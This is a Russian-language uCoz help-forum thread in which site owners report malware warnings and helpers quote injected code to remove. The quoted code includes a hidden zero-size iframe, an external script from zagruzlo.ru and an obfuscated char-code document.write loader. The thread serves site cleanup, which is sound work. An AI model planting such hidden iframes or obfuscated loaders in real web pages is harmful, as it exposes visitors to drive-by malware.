Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
Елка-Палка,
Quote Это хороший обменник трафиком. Это совсем не вирус. Не первый год стоит на разных сайтах. У вас от juice.ucoz.ua типа копирайт написан 2011 ТвойСайт.Ru, Все права не нарушены. Адаптировал <a href="http://juice.ucoz.ua/">Juice</a> . А на том сайте уже кучи скриптов , ссылок с/на иные сайты ? так что может что то прилетать и от туда , через iframe этого сайта ... Если что то ставите смотрите откуда это , что на том сайте и далее до третьего - пятого колена ... Как правило такой хлам стоит что удивляться нечему ...  Quote Вот это надо написать на то место, где стоял <iframe>?  Сообщение отредактировал Miss_Esq - Пятница, 11 Ноя 2011, 12:40:53
|
|
Елка-Палка, ссылку на непонятный фейк нужно удалить польностью
в коде страницы и обнаружен сайт из-за которого забанили ваш Quote <font color="#32cd32">Обновления сайта!!</font><br><a href="http://unol.ru/"><img src= |
|
Я вот всю рекламу удолил и поставил старую и серовно гдето сидит вирус на сайте вот проверил там даже пишет вот скрин вот сайт http://zakamsk23.ucoz.ru/
вот сылка где проверял http://antivirus-alarm.ru/proverka/?url=zakamsk23.ucoz.ru%2F&again=1 |
|
safa, У вас груды скриптов качаются с чужих сайтов , то что красным удаляйте , нет такого сайта ...
<script type="text/javascript"> hs.graphicsDir = 'http://cszona-portal.net.ru/highslide/graphics/'; </script> а с этим если нужен , то скачайте его себе на сайт , прверьте и перепишите ссылки на свой скрипт ..... <script type="text/javascript" src="http://gm-max.3dn.ru/js/highslide.js"></script> Да и это , непонятно зачем вам ?? <!-- Сайтер.ру - комментируй интернет! http://saiter.ru/ --> <script type="text/javascript" src="http://saiter.ru/js/sticky_button_01.js"></script> <script type="text/javascript">init_feedbackButton('left');</script> <!-- /Сайтер.ру --> Сообщение отредактировал Miss_Esq - Суббота, 12 Ноя 2011, 15:26:50
|
|
Google chrome выдает такой текст при входе на сайт NewVegas.at.ua
newvegas.at.ua содержит материалы сайта fertyio.tk, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта. Google обнаружил, что на ваш компьютер могут быть установлены вредоносные программы, если вы продолжите просмотр этого сайта. Если вы посещали его в прошлом или доверяете ему, вполне возможно, что он недавно был взломан хакерами. Рекомендуется прекратить просмотр и посетить сайт завтра либо перейти на другой сайт. Мы уже сообщили владельцу сайта fertyio.tk о том, что на его сайте найдено вредоносное ПО. Подробнее о проблемах, обнаруженных на fertyio.tk, можно узнать на странице Google Страница диагностики безопасного просмотра. Ничего дельного мне ни гугл ни яндекс не сказал. Появилось сразу после использования сервиса http://vorimo.ru/as/ С антивирусом ничего сказать немогу ибо я недавно переустанавливал ОСь и неуспел установить. Стоит ли его блокировать? |
|
Ragnazar3693, вы являетесь администратором этого сайта? если да, то вам надо удалить вредоносный код
находится в блоке плеер Quote data="http://sunwave-fm.eu/players/silver/energy2.swf" height="75" width="180"><script src="http://zagruzlo.ru/swf.js" type="text/javascript"></script><param name="allowScriptAccess" value="always"><param name="wmode" value="transparent"> а вот это совсем печально, но показательно Quote |
|
Здравствуйте!
Ссылка на сайт http://allprezentation.ru Описание проблемы: Яндекс обнаружил на страницах (http://allprezentation.ru/index/istorija/0-14; http://allprezentation.ru/index/biologija/0-8; http://allprezentation.ru/index/fizika/0-7; http://allprezentation.ru/index/obzh/0-22 ) Mal/Iframe-Gen. Проверил все страницы в Панель управления-Управление дизайном (шаблоны) и нашел только вредоносной код (на мой взгляд) такого содержания в "Верхней части сайта" Но этого однозначно мало. Т.к. при просмотре исходного кода указанных выше страниц через Оперу есть еще подозрительный код, только где его найти не знаю: |
|
tvinsen, под верхним сполером у вас действительно вредоносный код
под вторым сполером ничего вредоносного нет. это вывод рекламы юкоза, счетчик, и системные библиотеки, ваша иконка и стили. под вторым сполером все чисто. вам осталось дождаться когда робот яндекса перепроверит сайт. не обнаружит вредоносный код и снимет предупреждение |
|
Сайт http://apbclanwar.clan.su/
на всех браузерах "Внимание! Обнаружена проблема! apbclanwar.clan.su содержит материалы сайта fertyio.tk , который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта. Google обнаружил, что на ваш компьютер могут быть установлены вредоносные программы, если вы продолжите просмотр этого сайта. Если вы посещали его в прошлом или доверяете ему, вполне возможно, что он недавно был взломан хакерами. Рекомендуется прекратить просмотр и посетить сайт завтра либо перейти на другой сайт. Мы уже сообщили владельцу сайта fertyio.tk о том, что на его сайте найдено вредоносное ПО. Подробнее о проблемах, обнаруженных на fertyio.tk, можно узнать на странице Google Страница диагностики безопасного просмотра." я администратор сайта, но с юкозом работаю впервый раз.пересмотрел коды но ничего не нашел.помогите пожалуйста!!! Добавлено (15-Ноя-2011, 09:44:12) |
|
Vladimiruss, таки остался у вас код. из блока радио гта удалите следующее
Quote <iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://mirmuzla.net.ru"></iframe> |
|
http://ice-lira.ucoz.ru/
Вы должны дать описание проблемы: 1)http://ice-lira.ucoz.ru/ нод пишет обнаружена угроза 2) под гостем тоже |
|
Fabregas0814, вот это уберите
Quote <SCRIPT LANGUAGE="JavaScript"> <!-- function Decode(){var temp="",i,c=0,out="";var str="60!84!68!32!119!105!100!116!104!61!34!55!48!48!34!32!98!97!99!107!103!114! 111!117!110!100!61!34!115!107!105!110!47!111!115!110!95!51!46!106!112!103!34!32! 104!101!105!103!104!116!61!34!49!55!51!34!32!105!100!61!34!116!100!50!56!48!34!62 !38!110!98!115!112!59!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!47!84! 68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!47!84!68!62!60!47!84!82!62!60!47!84! 65!66!76!69!62!60!66!82!62!60!66!82!62!60!66!82!62!13!10!60!84!65!66!76!69!32!115!116! 121!108!101!61!34!87!73!68!84!72!58!32!54!50!52!112!120!59!32!72!69!73!71!72!84!58!32 !51!49!57!112!120!34!32!99!101!108!108!83!112!97!99!105!110!103!61!34!48!34!32!99!101 !108!108!80!97!100!100!105!110!103!61!34!48!34!32!97!108!105!103!110!61!34!114!105!103 !104!116!34!32!98!111!114!100!101!114!61!34!48!34!32!105!100!61!34!116!97!98!108!101!50 !51!57!34!62!13!10!60!84!82!32!105!100!61!34!116!114!50!52!48!34!62!13!10!60!84!68!32!105 !100!61!34!116!100!50!52!49!34!62!60!80!32!97!108!105!103!110!61!34!108!101!102!116!34!62 !60!73!77!71!32!115!114!99!61!34!115!107!105!110!47!110!105!122!46!106!112!103!34!32!98!111! 114!100!101!114!61!34!48!34!62!60!47!80!62!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69 !62!13!10!60!68!73!86!32!105!100!61!34!100!105!118!51!48!52!34!62!13!10!60!84!65!66!76!69!32! 115!116!121!108!101!61!34!87!73!68!84!72!58!32!50!54!49!112!120!59!32!72!69!73!71!72!84!58!32 !51!49!56!112!120!34!32!99!101!108!108!83!112!97!99!105!110!103!61!34!48!34!32!99!101!108!10 8!80!97!100!100!105!110!103!61!34!48!34!32!97!108!105!103!110!61!34!108!101!102!116!34!32!98 !111!114!100!101!114!61!34!48!34!32!105!100!61!34!116!97!98!108!101!50!51!57!34!62!13!10!60!8 4!82!32!105!100!61!34!116!114!50!52!48!34!62!13!10!60!84!68!32!118!65!108!105!103!110!61!34!9 8!111!116!116!111!109!34!32!97!108!105!103!110!61!34!108!101!102!116!34!32!105!100!61!34!11 6!100!50!52!49!34!62!60!80!32!97!108!105!103!110!61!34!108!101!102!116!34!62!60!73!77!71!32!1 15!114!99!61!34!115!107!105!110!47!110!105!122!95!108!101!102!116!46!106!112!103!34!32!98!111 !114!100!101!114!61!34!48!34!62!60!47!80!62!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69 !62!13!10!60!84!65!66!76!69!32!115!116!121!108!101!61!34!87!73!68!84!72!58!32!52!56!50!112!120! 59!32!72!69!73!71!72!84!58!32!51!49!57!112!120!34!32!99!101!108!108!83!112!97!99!105!110!103!6 1!34!48!34!32!99!101!108!108!80!97!100!100!105!110!103!61!34!48!34!32!97!108!105!103!110!61!3 4!114!105!103!104!116!34!32!98!111!114!100!101!114!61!34!48!34!32!105!100!61!34!116!97!98!108 !101!50!51!57!34!62!13!10!60!84!82!32!105!100!61!34!116!114!50!52!48!34!62!13!10!60!84!68!32!9 7!108!105!103!110!61!34!99!101!110!116!101!114!34!32!105!100!61!34!116!100!50!52!49!34!62!60! 80!32!97!108!105!103!110!61!34!99!101!110!116!101!114!34!62!13!10!60!98!114!62!60!98!114!62!6 0!98!114!62!60!98!114!62!60!98!114!62!60!98!114!62!60!98!114!62!60!98!114!62!60!98!114!62!60!9 8!114!62!60!98!114!62!60!98!114!62!60!98!114!62!60!98!114!62!60!98!114!62!60!98!114!62!13!10!10 42!1089!1077!32!1087!1088!1072!1074!1072!32!1079!1072!1097!1080!1097!1077!1085!1099!46!32!1 69!32!50!48!4 9!48!32!87!79!87!45!1055!1086!1088!1090!1072!1083!13!10!60!98!114!62!13!10!1055!1088!1080!32!10 82!1086!1087!1080!1088!1086!1074!1072!1085!1080!1080!32!1084!1072!1090!1077!1088!1080!1072!10 83!1086!1074!32!1089!1089!1099!1083!1082!1072!32!1085!1072!32!1080!1089!1090!1086!1095!1085!1 080!1082!32!1086!1073!1103!1079!1072!1090!1077!1083!1100!1085!1072!46!13!10!60!98!114!62!13!10 !60!83!84!82!79!78!71!62!60!69!77!62!60!65!32!104!114!101!102!61!34!104!116!116!112!58!47!47!116! 104!101!98!101!115!116!115!116!117!100!105!111!46!114!117!34!32!116!97!114!103!101!116!61!34!95 !98!108!97!110!107!34!62!60!70!79!78!84!32!99!111!108!111!114!61!34!35!52!54!56!50!98!52!34!62!100 !101!115!105!103!110!32!98!121!32!66!101!115!116!32!83!116!117!100!105!111!60!47!70!79!78!84!62! 60!47!65!62!60!47!69!77!62!60!47!83!84!82!79!78!71!62!13!10!60!98!114!62!";l=str.length;while(c<=str.length-1){while(str.charAt©!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} //--> </SCRIPT><SCRIPT LANGUAGE="JavaScript"> <!-- Decode(); //--> </SCRIPT> |
|
Всем доброго вечерочка!
Как у начинающего, у меня появилась проблемка с сайтом. Похоже из-за своего незнания в нем завелась бяка. Помогите пожалуйста! Адрес такой:http://winalitedom.ucoz.ru Если что будет, напишите как вылечить. Конечно можно его удалить и все начать заново, сайт еще не доделан. |
|
Vint4070, проблема ещё существует? и под логином и под гостем у вас чисто. не могли ли вы перевести фразу
Quote в нем завелась бяка. |
| |||